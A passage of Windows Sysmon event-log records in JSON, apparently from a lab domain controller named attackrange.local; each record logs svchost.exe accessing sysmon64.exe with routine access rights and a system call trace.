07:53:24.353","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1482,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.353\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.353","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1483,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.353\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.353","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1484,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.353\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.353","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1485,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.353\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.353","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1486,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.353\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.353","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1487,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.356","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1488,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.356","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1489,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.356\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 